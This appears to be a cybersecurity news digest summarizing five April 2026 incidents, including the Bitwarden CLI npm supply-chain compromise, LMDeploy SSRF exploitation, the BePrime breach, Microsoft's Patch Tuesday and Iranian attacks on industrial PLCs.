Article Read Time
Top 5 Cyber Security News Stories
1. Bitwarden CLI Compromised in Supply Chain Attack
The command-line interface for popular password manager Bitwarden was briefly hijacked on April 22 as part of an ongoing supply chain campaign exploiting Checkmarx’s npm distribution pipeline. The malicious package, @bitwarden/cli@2026.4.0, was live for roughly 90 minutes before detection and contained a preinstall hook that harvested GitHub and npm tokens, SSH keys, environment variables, shell history, and cloud secrets — encrypting the stolen data with AES-256-GCM and exfiltrating it to a domain impersonating Checkmarx. Bitwarden confirmed no end-user vault data was accessed, revoked compromised access, and deprecated the poisoned release. The incident underscores just how thin the margin for error has become in software supply chains: a narrow window of exposure was all it took to put developer credentials and CI/CD secrets at risk.
Source: The Hacker News · SecurityWeek
2. LMDeploy AI Toolkit Exploited Within 13 Hours of Disclosure
A high-severity Server-Side Request Forgery flaw in LMDeploy, the open-source toolkit used to deploy and serve large language models, went from public advisory to active exploitation in under 13 hours. Tracked as CVE-2026-33626 (CVSS 7.5), the vulnerability sits in the vision-language image loader, which fetches arbitrary URLs without validating internal or private IP addresses. Sysdig’s Threat Research Team captured an attacker probing AWS metadata services, Redis, MySQL, and internal admin interfaces through the SSRF primitive in a single eight-minute session — rotating between vision-language models to avoid detection. Every version of LMDeploy through 0.12.0 with vision-language support is affected, and no official patch was available at the time of exploitation.
Source: The Hacker News · Sysdig
3. Cyber Security Firm BePrime Breached — Clients’ Surveillance Feeds Exposed
A threat actor compromised BePrime, a managed security services provider headquartered in Nuevo León, Mexico, after discovering that privileged administrator accounts had no multifactor authentication. Using stolen Cisco Meraki API keys, the attacker seized control of 1,858 network devices and more than 2,600 connected endpoints, then published screenshots of live surveillance camera feeds from client offices — including facilities belonging to Iberdrola, ArcelorMittal, Whirlpool, and Alsea. The 12.6 GB data dump included plaintext credentials, transaction records, and security audit reports. BePrime’s response drew additional scrutiny after the company issued legal threats against journalists covering the incident rather than offering a transparent accounting of what happened.
Source: DataBreaches.net · The Register
4. Microsoft’s Record-Setting Patch Tuesday Fixes SharePoint Zero-Day
Microsoft’s April 2026 Patch Tuesday addressed 167 vulnerabilities — the second-largest release on record — including an actively exploited SharePoint Server spoofing zero-day tracked as CVE-2026-32201 (CVSS 6.5). The flaw allows unauthenticated remote attackers to present falsified information, opening the door to phishing and social engineering attacks against organizations running SharePoint Enterprise Server 2016, Server 2019, and Server Subscription Edition. CISA added the vulnerability to its Known Exploited Vulnerabilities catalog and set a federal remediation deadline of April 28. Separately, CISA also flagged four additional actively exploited flaws on April 25 — two in SimpleHelp (CVE-2024-57726, CVE-2024-57728), one in Samsung MagicINFO 9 Server (CVE-2024-7399), and one in end-of-life D-Link DIR-823X routers (CVE-2025-29635) — with a May 8 deadline.
Source: BleepingComputer · SecurityWeek
5. Iran-Linked Hackers Disrupt U.S. Critical Infrastructure via Exposed PLCs
Six federal agencies — the FBI, CISA, NSA, EPA, DOE, and U.S. Cyber Command — issued a joint advisory warning that an Iranian-affiliated APT group has been actively exploiting internet-facing Rockwell Automation/Allen-Bradley programmable logic controllers across water, energy, and government facilities since at least March 2026. The attackers used overseas IP addresses and Rockwell’s own Studio 5000 Logix Designer software to establish connections, manipulate project files, and alter data displayed on HMI and SCADA panels. Several victims reported operational disruption and financial losses. The advisory urges organizations to immediately remove affected controllers from direct internet exposure and audit access logs on ports 44818, 2222, 102, and 502.
Source: CISA Advisory AA26-097A · The Hacker News